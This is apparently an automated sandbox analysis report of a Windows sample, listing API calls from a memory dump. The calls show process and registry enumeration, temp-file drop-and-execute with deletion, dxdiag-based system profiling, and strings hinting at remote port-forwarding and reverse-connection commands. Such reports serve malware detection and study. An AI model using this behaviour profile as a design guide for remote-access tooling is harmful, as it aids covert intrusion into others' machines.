                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410A98
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410AA1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410AB1
                                          • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                          • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                          • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AC2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410ACB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AD4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AE5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AEE
                                         Memory Dump Source
                                         • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                         Similarity
                                         • String ID: dat$image/png$png

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                          • Part of subcall function 00412AEB: GetCurrentProcess.KERNEL32(00408F3A,?,?,00408F3A,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00412AFC
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                          • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                          • Part of subcall function 00412B4A: OpenProcess.KERNEL32(00000410,00000000,00409B39,69D8CB60), ref: 00412B5E
                                          • Part of subcall function 00412B4A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00409FE3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409FF0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040A000
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A00C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A018
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A021
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A02D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A036
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A042
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A04B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A057
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A060
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A069
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A075
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A081
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A08D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A099
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0A2
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A0B0
                                        • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 0040A0BF
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000002,00000000), ref: 0040A0CC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0D5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

                                        APIs
                                        • RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                        • RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                        • RegEnumValueW.ADVAPI32 ref: 0040BC67
                                        • _itoa.MSVCRT ref: 0040BC7E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?,?,0040BE7D,0040C731), ref: 0040BC96
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000,?,0040BE7D,0040C731), ref: 0040BCA8
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCB6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCBF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCCB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415770,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCE0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCEF
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCFD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD06
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD12
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([regsplt],?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD27
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD42
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD50
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD5E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD6A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD76
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD82
                                         Memory Dump Source
                                         • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                         Similarity
                                         • String ID: [regsplt]

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                        • getenv.MSVCRT ref: 0040EFDC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                        • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                        • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                        • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                        • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                        • ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                        • WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                        • CloseHandle.KERNEL32(?), ref: 0040F0D2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                        • DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F116
                                        • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(0000006F), ref: 0040F12E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F137
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F140
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F149
                                         Memory Dump Source
                                         • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                         Similarity
                                         • String ID: <$@$Temp

                                        APIs
                                        • _wgetenv.MSVCRT ref: 0040E93E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,00000000), ref: 0040E949
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040E954
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E95F
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,/t ,?,00000000,00000000), ref: 0040E976
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000), ref: 0040E980
                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,?,00000000), ref: 0040E992
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000,00000000), ref: 0040E99B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000), ref: 0040E9A8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000000,00000000), ref: 0040E9B7
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • Sleep.KERNEL32(00000064,00000000,00000000), ref: 0040E9C7
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9D1
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9E6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040E9F7
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040E9FE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040EA3C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040EA46
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000097,?,?,?,?,?,?), ref: 0040EA5E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA77
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA80
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA89
                                         Memory Dump Source
                                         • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                         Similarity
                                         • String ID: /t $\sysinfo.txt$dxdiag$open$temp

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A383
                                        • SetEvent.KERNEL32(?), ref: 0040A38C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A395
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 0040A3AD
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040A3BE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A3CD
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • inet_ntoa.WS2_32 ref: 0040A41B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A42E
                                        • atoi.MSVCRT ref: 0040A435
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A472
                                        • atoi.MSVCRT ref: 0040A479
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040A4A6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A544
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415B18), ref: 0040A56E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415B18), ref: 0040A578
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415908), ref: 0040A5AB
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415908), ref: 0040A5B5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000085,?,?,?,?,0041B310,00415908), ref: 0040A5CC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5DD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5E6
                                         Memory Dump Source
                                         • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                         Similarity
                                         • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 00402291
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,69D65DF0), ref: 00402302
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402363
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040236D
                                        • CreateThread.KERNEL32(00000000,00000000,?,0041BE70,00000000,00000000), ref: 0040237E
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402389
                                        • CloseHandle.KERNEL32(00000000), ref: 00402392
